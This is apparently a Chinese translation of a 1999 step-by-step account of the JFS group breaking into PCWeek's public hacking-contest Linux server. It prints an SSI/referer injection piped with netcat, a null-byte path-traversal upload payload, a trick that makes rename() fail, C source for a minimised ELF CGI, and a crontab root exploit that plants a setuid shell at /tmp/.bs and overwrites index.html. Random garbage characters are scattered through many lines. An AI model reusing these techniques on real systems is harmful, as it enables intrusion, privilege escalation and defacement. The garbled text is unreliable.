JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
- F* m; J( f& O5 h3 b的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。
! e( B' ?' i: p( r1 P
8 H4 B# c: _& b0 @1 X; F% t
. [2 V0 p7 i5 p+ K/ O- w首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
4 E! [3 h1 I" ], r描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
以我们只能从 HTTP 服务器着手了。

. q8 x- j( p& O  y5 K7 O1 ~lemming:~# telnet securelinux.hackpcweek.com 80
$ R" `1 m  G1 g6 D1 Q( \Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
Escape character is '^]'.
; Q3 {. o" ?8 J" J; W+ J) ePOST X HTTP/1.0

HTTP/1.1 400 Bad Request
Date: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
% y- N/ g* }# z6 w(...)
Connection closed by foreign host.
& \) B$ X/ O( t0 X) H' I1 hlemming:~#
2 z5 N4 j' R$ R7 {: U  }- {
( Z8 u% ]- x0 B7 Z1 r8 g9 g嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
$ g% s4 @" f% v' [Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
5 f( P, ?8 Q3 Q% o/ p2 ]的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
8 U& T, \" u9 \2 b. m/ S了网站DocumentRoot下的目录结构：
' t" f- t- P' L+ ]# W
/
/cgi-bin
/photoads/
! R( Q; l1 r4 {& n7 \; K/photoads/cgi-bin
4 T+ N6 i9 u- x
很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
* w1 M# v7 Y0 {! l* j0 ]www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
7 M; D8 r( S/ J" j  E* G  @1 f我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
0 G3 F  t4 x/ {运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
9 [) i3 v, U+ j" B1 W  a2 l1 s5 }/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
# U& ~- p) x/ A# A% JDocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
) F& Z- H0 w- Fnobody）等。
现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
4 p* A  Y3 M2 I% K, V% y命令的漏洞，如：

) o- Q4 U' w7 r) X8 _* |5 D<!--#include file="..."--> for SSI
! g! A2 J: O- o! R3 K5 A+ A# d3 M<!--#perl ...--> for mod_perl

2 W& c0 K# Q4 O: p但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
% b1 M: N& I' v& Y  ?4 N+ w个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
, x4 g7 i/ j3 G; u, q令嵌入到由服务器端解析的 HTML 代码中：
" z+ I  d7 l' g- J5 ^! d% z
在 post.cgi，行 36：
print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
8 J5 b. `5 X7 R/ z( l2 `* ^
$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
3 o! i7 D7 I& L6 m0 s( S; f码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：

lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
* ^' n6 X2 G* S( e; b- X
7 X% L- [2 B" c( p8 h; K但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
+ i: `- \" ?5 q( d入系统。

' G9 W( h0 F0 O+ M# Z因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
0 q; ?" z2 ^/ J1 f: ]( l# I虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
  h# n; Z; W, q/ \$ Z8 t
lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
0 T1 u. {8 i7 N: }: r$ y: E7 t
! D% T, c( E5 Q! I: vadvisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
7 g* Z8 x* ^; Y# Iedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
: E8 B7 d1 O& z7 M0 i7 ^photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
. |9 ], f" V3 W2 Y6 H(...)
- ?+ \4 |/ _- @& U
$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
但其余两个就……
* z/ s7 [1 z6 r$ Y5 X
) f/ W, L, N7 e$ R/ d, l在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

. H( d5 K9 I  z8 n+ l' b: u. |open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
6 l$ K8 q. ]- U! W, C3 n8 J) aprint ULFD $UPLOAD{'FILE_CONTENT'};
, a8 p" A) {8 T+ P1 R5 L  ~0 nclose(ULFD);
3 A8 n, w" ?" ^9 m' D3 G% C: S
因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
$write_file 变量来自：

$ b' s$ \' k7 W; e& x$write_file = $Upload_Dir.$filename;
& s  v1 d8 l. y% u$ u
其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
6 B9 O0 K/ i6 j1 W; G& F4 J  C7 @+ V/ V
+ z- C; |: g# H# {; S在 photo.cgi，行 226：
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
, X' @0 ^/ P0 ~" S
+ Q) \+ Y' \: p0 E$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
# ]" P0 ^/ q  D" w9 e" C
if ($filename =~ m/gif/) {
$type = '.gif';
6 W( u! S8 [. L4 }3 D3 @5 U}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
5 f  R+ w  r0 L7 Y/ u}else{
{&Not_Valid_Image}
; E& S; f8 e5 }: E}

由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
得任何文件。匹配表达式为：

' ^+ N% X7 |, W& @. @% {# `$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

! H9 b; c2 _8 c6 h' G我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式

/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
' V5 }6 v2 F$ z, K9 `
; p6 ^( j( l: f4 K* I" F% T& r可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
: u9 G0 p5 i. O' p包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
: x1 v2 i/ u2 L8 E  l' |- {/ M在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
9 P" w6 q6 F- e; j) g（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
: L" O8 |; V/ I, v+ J- `9 ^6 c删除该上载文件。这当然不是我们所希望的！
# S6 N5 x; v! v4 o/ t1 y. J0 GPCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
而将主要精力集中在GIF上。

. F- Q9 n6 M$ a* h9 gif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
; B3 h. o3 ?8 d' m) I* a% bmy $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
1 e" k" E8 j+ J! Q. r9 j1 Oclose FILE;
$PhotoWidth = $width;
1 L6 [3 @8 o. h7 A  r: R1 b$PhotoHeight = $height;
3 e+ t9 q( C% Z2 z& y4 K$PhotoSize = $size;
return;
}
2 `0 A; [2 O$ A' J" z* k% v% g0 l
在 photo.cgi，行 140：

if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
; ]2 r5 ]% S/ B, ~( E/ ~; C, i8 l{&Not_Valid_Image}
}

! ~( X# _3 ?. D' wif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
: U5 a$ A3 W/ P5 Z, D  D}
0 k) |$ k6 }: L
由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
。
所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
2 B2 [6 q4 ^/ q6 W7 g5 V% v对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
（NUL）。
在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
个问题：
- \8 Q: F9 J* ]0 r
chmod 0755, $Upload_Dir.$filename;
$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
* w4 }. u4 w8 d* ]- [5 w" |4 ~
Show_Upload_Success($write_file);

哇！文件将被改名/移动（这可是我们绝对不希望的！）。
; S9 _% i: H- _查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
8 X5 J! N, c3 E6 G- n  X0 O! w$AdNum = $UPLOAD{'AdNum'};
8 O& N+ {% ]* ~5 N: t, H
; g" C, S$ q  S# _5 L* K8 g其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
% r/ D  T% R( |7 g. |/ m哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
文件名超过1024字节长，即可绕过这个过滤器。
- m, P- X5 R; X- j- k" a/ b所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
6 S! }* p0 L/ m" a" q发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
1 u  Y& i& l: N: F+ ~& |( f1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
我们又遇到另一个难题了！……
2 K+ z2 g+ K. P( K
/ `! Z# N5 Q5 I0 g我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
$ j8 }9 _  ~: P) d呢？;-)
- d3 r/ \# c) t1 k/ n' _6 J' ~请阅读用于创建新AD值的程序文件 long.adnum。
7 z, u9 y* w6 ?当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
4 F0 R5 }& _5 \8 I% u- T文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。

! ]$ O9 x% o5 n现在就让我们对该主机试一试这个方法。
' V! Y4 d  W3 c/ E嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
1 ^% I/ x# `' f/ I: s成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
( L. S( Y! ?3 G# J( U, y$ i: W
1 b" |- t8 C) ]* K
让我们试一下是否还有其它入侵方法……

1 Y8 P1 X. P4 b" Q5 ^3 _7 x我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
些“绝密”文件，然后拿出动卖。:)
5 j4 {0 l5 |8 f$ V我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
道它有什么用吗？:)）
现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
然而，这个以CGI方式运行的shell脚本必须符合以下格式：
. k' S3 m& b/ W1 @" Y3 k
; t! L/ d/ ^# U; Y1 Z#!/bin/sh
echo "Content-type: text/html"
5 `1 U6 }% t% efind / "*secret*" -print
% Y# F! M* ]5 t6 {
同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……

4 j: H# T9 O$ }: Y& z#!/bi\00\00\00\00n/sh

; Q: @* A8 k! u% t/ u1 @以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
  \" \$ {+ _) |/ Z我们无法只用三个字节去获得一个shell。又遇到难题了！:(

让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
- l, C2 E# K9 i2 S- q8 v9 O解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
" }3 U( \' N+ R8 hURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1 n) q( e" X- B6 [3 E2 ~1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
2 y( l1 }( `- D
$ Z8 Q+ f! c, I# {4 u1 Y以下这个程序：

lemming:~/pcweek/hack/POST# cat fin.c
/ U# H& c8 p) X, S/ k3 k9 }#include <stdio.h>
7 A4 c. M. A4 imain()
1 j) V5 }6 U8 j% Z, G% ^! G  X: N{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
execlp("/usr/bin/find","find","/",0);
1 G" `( V% p4 E0 H  s}
; K% ?) R& q* s
4 J0 p' }. H. Z8 z4 x% `$ q编译后：

9 }, P( d" |( a  y0 h0 plemming:~/pcweek/hack/POST# ls -l fin
8 U" K, i, f' i-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
6 e# G5 k  w0 @, f1 q- m9 W9 {
优化（清除symbols）后：
8 g9 s! c( P8 k+ w
5 X. p6 D8 i" Elemming:~/pcweek/hack/POST# strip fin
; o% S0 U' ]; @: H! x5 \0 D  U$ r1 [lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
% o0 n" _% W$ Olemming:~/pcweek/hack/POST#

) o' `$ h- u- _7 @5 p( [5 YURL编码后：
6 ^# C2 S) }& |) W6 g9 P4 K9 \2 j
% c. [5 l0 W9 @$ J3 a. l5 ilemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
9 z% D6 N* @, j& ?( z5 {效：
; T, n$ g/ r( ], _+ t1 g! j: }
, b' a. P2 \* k* Q9 ^/ T" o) Klemming:~/pcweek/hack/POST# joe fin
7 w' T+ Z4 J' b; Y$ j+ [* y# j! f7 Mlemming:~/pcweek/hack/POST# ls -l fin
/ }; r3 j) Q- G" O! j-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
# o  Z( u; y& O5 o( t9 g/ Glemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
( v+ H! r, F7 _  qlemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
6 G4 p. S: s4 o4 \9 mlemming:~/pcweek/hack/POST#
9 t2 y6 g+ y1 |) W  y0 V' W% m
8 t: W0 P9 u, F  a  f. O3 h请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。
2 A: F5 D- L, m5 N. D/ U) d1 S
现在，将这个CGI上载到服务器，再用浏览器访问它，如：

' t+ b0 A8 ]0 g- t1 ~wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi

服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
+ s% @2 F2 q% {- z我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
$ j" O, e" u! D# F8 P" ~[我怀疑这些文件是否真的保存在该服务器上！]


好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
) u) v( }  S+ H# N: y轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
, D$ t2 N, V9 l0 B0 v4 @5 x5 R$ b我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
观察其运行结果。
& }2 T" \8 p4 Y2 j) z6 Y$ a我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

) z8 V2 C  t# {8 q5 kexeclp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);

好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)
1 T3 O2 R. d0 _/ b! h
7 X; g6 }9 ~+ `# w9 }+ h